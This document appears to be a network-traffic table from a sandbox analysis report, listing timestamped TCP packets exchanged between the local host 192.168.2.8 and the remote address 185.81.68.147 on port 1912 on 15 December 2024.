                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904629946 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904685974 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904719114 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904768944 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904778004 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:53.904789925 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.022654057 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.022697926 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.022835970 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.022845030 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.022922039 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.022931099 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.022994995 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023013115 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023092985 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023118019 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023192883 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023211002 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023257017 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023461103 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023499966 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023622990 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023646116 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023683071 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023721933 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023731947 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023794889 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023804903 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023806095 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023916006 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.023966074 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024029016 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024038076 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024166107 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024185896 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024282932 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024291992 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024323940 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024375916 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024421930 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024432898 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024499893 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024537086 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024609089 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024660110 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024748087 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024756908 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024790049 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024801016 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024859905 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024888039 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.024996042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025006056 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025019884 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025048971 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025099039 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025108099 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025206089 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025214911 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025260925 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025316954 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025327921 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025357962 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025398970 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025415897 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025512934 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025523901 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025583029 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025592089 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025623083 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025631905 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025702000 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025712967 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.025775909 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.026165962 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.026395082 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.026468992 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.143696070 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.143711090 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.143722057 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.143733978 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.143778086 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.143790007 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.143894911 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.143906116 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.143918037 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.143974066 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144047022 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144057035 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144124031 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144207954 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144217014 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144227028 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144253016 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144262075 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144345999 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144370079 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144529104 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144539118 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144551039 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144601107 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144651890 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144661903 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144685984 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144720078 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144762993 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144772053 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144854069 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144864082 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144944906 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.144954920 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145026922 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145036936 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145126104 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145134926 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145159960 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145178080 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145263910 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145273924 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145344973 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145354033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145418882 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145427942 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145453930 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145505905 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145514965 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145627975 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145637989 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145648003 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145683050 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145693064 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.145978928 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146076918 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146085024 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146205902 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146224022 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146308899 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146318913 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146354914 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146379948 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146533966 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146543980 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146555901 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146663904 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146676064 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146704912 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146714926 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146795034 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146805048 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146823883 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146855116 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146905899 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.146935940 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.161753893 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.161772966 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.161784887 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.239229918 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.239278078 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.254174948 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.254193068 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.254215002 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.254225969 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263456106 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263490915 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263537884 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263561010 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263582945 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263605118 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263647079 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263668060 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263708115 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263729095 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263771057 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263792992 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263830900 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263853073 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263876915 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263932943 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.263976097 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.264017105 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.264041901 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.264082909 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.264161110 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.264183998 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.264327049 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.264352083 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.264375925 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.265777111 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.265870094 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.265892982 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.265919924 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.265958071 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.265981913 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266022921 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266086102 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266108990 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266155958 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266180992 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266284943 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266307116 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266359091 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266380072 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266439915 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266460896 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266498089 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266520977 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266585112 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266604900 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266630888 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266674995 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266731024 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266772032 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266793966 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266819000 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266886950 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266910076 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266948938 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.266971111 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267043114 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267065048 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267133951 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267155886 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267276049 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267298937 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267353058 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267374992 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267416000 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267436981 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267476082 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267498016 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267561913 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267584085 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267621994 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267642975 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267671108 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267709970 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267748117 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267770052 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267795086 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267833948 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.267929077 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.272420883 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.272525072 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.272525072 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.272594929 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.392474890 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.392491102 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.392508984 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.392518997 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.392548084 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.392558098 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.392631054 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.392641068 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.392678022 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.392807007 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.392817974 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.392858028 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.392919064 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.392963886 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393012047 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393151045 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393162012 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393196106 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393254042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393342972 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393353939 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393428087 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393445969 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393595934 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393727064 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393737078 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393747091 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393765926 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393775940 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393848896 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393866062 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:54.393913031 CET191249710185.81.68.147192.168.2.8
